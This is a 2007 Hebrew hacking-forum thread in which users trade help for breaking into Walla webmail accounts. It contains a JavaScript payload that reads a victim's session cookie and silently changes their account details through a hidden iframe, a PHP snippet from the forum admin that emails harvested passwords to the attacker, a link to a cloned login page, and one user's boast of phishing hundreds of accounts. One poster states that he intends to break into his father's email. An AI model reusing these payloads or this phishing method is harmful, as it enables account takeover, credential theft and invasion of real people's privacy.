ההודעה נכתבה על-ידי k_rapper ב-30/09/2007 19:15:07
|
k_rapper
מנותק\ת
דרגה: משתמש רגיל
הודעות: 12
הרשמה: 29/09/2007
|
כיום האיימל של וואלה הוא בין המבוקשים לפריצה
מלא אנשים מחפשים מדריכים לפרוץ אליו
ומכיוון ורוב המדריכים שעובדים על שאר האימלים לא תקפים
לגביו חשבתי שבעזרת הנדסת תוכנה קטנה וקצת פישינג
יהיה אפשר לעשות פישינג לקטע של ההתחברות
בדיוק כמו שעשו פה לדברים אחרים :
http://security.kcsnet.net/shlomix/plus/Phishing/Phishing.html
ואז לרק לשנות את האיימל ולשלוח ולקבל את הסיסמא והשם משתמש של הבן אדם ...
אז ניסיתי עכשיו בחפיף לא הלך לי תכף אני ישב רציני ינסה שוב
כל מי שיכול לעזור ומעוניין לעשות איזה דף פישינג קטן
מוזמן לעלות לאתר ולשתף את כולם
שיהיה ערב טוב חברים 
|
|
ההודעה נכתבה על-ידי SkOd ב-30/09/2007 22:19:42
|
SkOd
מנותק\ת
דרגה: משתמש רגיל
הודעות: 150
הרשמה: 08/02/2006
|
עזוב אותך פישינג. אפשר לפרוץ אימלים בוואלה
פשוט תמשיך לעבוד על זה.
|
|
ההודעה נכתבה על-ידי k_rapper ב-30/09/2007 22:29:03
|
k_rapper
מנותק\ת
דרגה: משתמש רגיל
הודעות: 12
הרשמה: 29/09/2007
|
איך ??
יש לך רעיון אחי חוץ מברוט פורס
שוט ! אני מקשיב ...
|
|
ההודעה נכתבה על-ידי k_rapper ב-30/09/2007 22:31:54
|
k_rapper
מנותק\ת
דרגה: משתמש רגיל
הודעות: 12
הרשמה: 29/09/2007
|
שימו לב זה קטע מתוך אחד המאמרים של קבוצת האקינג ikp
בנושא האיימל של וואלה :
קוד:<html>
<script>
var last = document.cookie
var counter = ""
for (var i = 0; i < last.length; i++)
if (last.charAt(i) == "n")
if (last.charAt(i+1) == "i")
if (last.charAt(i+2) == "c")
if (last.charAt(i+3) == "k")
if (last.charAt(i+4) == "="){ j=i+5;
while (last.charAt(j+1) > "%"){
counter = counter + last.charAt(j)
j = j+1}}
for (var i=1 ; i<2 ;i++){
document.write("<iframe style=’position:absolute;visibility:hidden;’ src=http://friends.walla.co.il/ts.cgi?
tsscript=reg.commit&l=&status=1&edit=1&ReturnURL=http%3A%2F%2Fmail.walla.co.il
&username=",counter,"&password=oooo&passwordv=oooo&
hintq=question&hint=tanswer&DD=11&MM=1&YYYY=1999&email=aaa@mail.boo.il&
pharea=123&phnum=123456&fname=name&lname=fam&gender=2&cityname=scxzc&areacode=0&
vcard=&keywords=&homepage=&surffrom=0&occupation=0&education=0></iframe>")
}
setTimeout(’top.location.href="http://www.walla.co.il/?w=/friends/logout"’, 3000)
</script>
</html> |
|
וניסיתי את זה זה לא עובד יש למישהו רעיון איך אפשר לערוך את זה ככה שזה יעבוד ??
ערכתי את השורה המעצבנת..
[ההודעה נערכה על-ידי devil kide ב-01/10/2007 20:55:15]
[ההודעה נערכה על-ידי devil kide ב-01/10/2007 20:55:43]
|
|
ההודעה נכתבה על-ידי antivirus ב-01/10/2007 11:55:05
|
antivirus
מנותק\ת
דרגה: משתמש רגיל
הודעות: 690
הרשמה: 11/12/2005
|
א: שמישהו יתקן את הבאג ויעשה פה גלישת שורות כדי שהעמוד לא יראה ככה
ב: פעם פרצתי בעזרת הנדסת אנוש ל300 אימיילים בוואלה איך? ככה!
יצרתי עמוד שרוב העבודה עליו (כמה ימים) הייתה בשביל הקוסמטיקה שלו שיראה בול של וואלה כל הקישורים בעמוד עבדו לוואלה כל הדברים הכי קטנים היו זהים קופי לוואלה
ואת העמוד הזה הכנסתי להודעת דוא"ל
והודעתי לכולם שהייתה נפילה בשרתים ויש פריצות וכל המשתמשים חייבים לשלוח פרטי התחברות לאתר וואלה כי רק ככה אפשר לאמת שהכתובת אמיתית ולא הדואר ימחק ותתפלאו אבל מאות אנשים שלחו לי את פרטי ההתחברות שלהם עכשיו מה שמצחיק זה שכבר עבר יובל מאז שעשיתי את זה ועד היום זה עובר ברשימות תפוצה של אנשים ואני מקבל עוד ועוד פרטי התחברות חחח
|
|
ההודעה נכתבה על-ידי T4uSBaZ ב-01/10/2007 12:24:42
|
T4uSBaZ
מנותק\ת
דרגה: משתמש רגיל
הודעות: 258
הרשמה: 01/08/2006
|
שמישו יתקן פה ת’גלישת שורות סעמק..
[ההודעה נערכה על-ידי T4uSBaZ ב-01/10/2007 12:26:22]
|
|
ההודעה נכתבה על-ידי Rx3vL0n ב-01/10/2007 12:24:44
|
Rx3vL0n
מנותק\ת
דרגה: משתמש רגיל
הודעות: 2553
הרשמה: 12/03/2006
|
לול אנשים הם הנקודה הכי חלשה באבטחת מידע
|
|
ההודעה נכתבה על-ידי k_rapper ב-01/10/2007 19:20:20
|
k_rapper
מנותק\ת
דרגה: משתמש רגיל
הודעות: 12
הרשמה: 29/09/2007
|
antivirus אחי כבר יצרתי את כל הפישיניג זה לא היה קשה כולה צריך להוריד את הקוד מקור לשמור את זה עם התמונות ולהעלות לשרת החלק שאני לא מבין זה איפה בקוד מקור אני צריך לשנות ככה שברגע שהם ישימו את השם משתמש והסיסמא וילחצו על יתחבר זה ישלח לי לאיימל את השם משתמש והסיסמא שלהם ...
|
|
ההודעה נכתבה על-ידי k_rapper ב-01/10/2007 19:28:46
|
k_rapper
מנותק\ת
דרגה: משתמש רגיל
הודעות: 12
הרשמה: 29/09/2007
|
הנה הדף פישינג שבניתי העלתי אותו סתם לנענע להמחשה אל תתייחסו לכתובת הלא הגיונית אני ישנה שרת ברגע שאני רק ידע איפה לשנות בקוד מקור כדי שזה ישלח לי לאיימל את השם משתמש והסיסמא
תראו את זה :
http://www.planetnana.co.il/rapper2008/friends.walla.co.il.htm
|
|
ההודעה נכתבה על-ידי k_rapper ב-01/10/2007 19:30:53
|
k_rapper
מנותק\ת
דרגה: משתמש רגיל
הודעות: 12
הרשמה: 29/09/2007
|
אהה שכחתי להגיד שאם אתם לא רואים טוב את הכתב תשנו את הקידוד
לעיברית iso -logical
|
|
ההודעה נכתבה על-ידי devil kide ב-01/10/2007 21:01:32
|
devil kide
מנותק\ת
דרגה: מנהל ראשי
הודעות: 5224
הרשמה: 18/10/2005
|
מכיוון ש HTML לא יכול לשלוח אימיילים-תחפש את המידע שנשלח (השורה של השם משתמש והסיסמא) ותשךח אותם לדף אחר, באותו הדף תכתוב קוד בשפת צד שרת שישמור את המידע שנשלח...
למשל
קוד:<?Php
$msg="Password:".$_POST[’pass’];
$mag.="email".$_POST[’mail’];
$msg="\n\r";
mail ($msg,"Walla Password","YourMail@server.com");
שגיאה בכניסה לאתר, נסה להתחבר שוב
?>
|
|
שישלח את לך אימייל עם שם משתמש וסיסמא...
כל מי שבא בטענות:שטלתי כמה טעויות בכוונה!
|
|
ההודעה נכתבה על-ידי k_rapper ב-01/10/2007 22:41:17
|
k_rapper
מנותק\ת
דרגה: משתמש רגיל
הודעות: 12
הרשמה: 29/09/2007
|
תודה אחי אני ינסה לחפש איפה
זה ולעשות את זה
|
|
ההודעה נכתבה על-ידי ShaDoW MaN ב-01/10/2007 23:43:09
|
ShaDoW MaN
מנותק\ת
דרגה: משתמש רגיל
הודעות: 100
הרשמה: 20/07/2007
|
פריצה לאימייל של וואלה לא כלכך מועיל..
אולי פה ושם לראות אימיילים של אנשים מכובדים..
|
|
ההודעה נכתבה על-ידי k_rapper ב-02/10/2007 01:38:48
|
k_rapper
מנותק\ת
דרגה: משתמש רגיל
הודעות: 12
הרשמה: 29/09/2007
|
אחי לי זה מועיל זה משהו ספיציפי אני צריך להיכנס לאיימל של אבא שלי
בעניין משפחתי דחוף ולבדוק כמה דברים
devil kid אני לחוץ בזמן ואני לא ממש מבין אתה יכול לעזור לי ולערוך את מה שרשמת ככה שזה יהיה טוב ולהסביר לי איפה לשים את זה בבקשה אני חייב את זה !
|
|
ההודעה נכתבה על-ידי devil kide ב-02/10/2007 12:45:23
|
devil kide
מנותק\ת
דרגה: מנהל ראשי
הודעות: 5224
הרשמה: 18/10/2005
|
אם זה המייל של אבא שלך זה יותר קל, בהנחה שהוא נכנס מהמחשב שאתה משתמש בו.
|
|
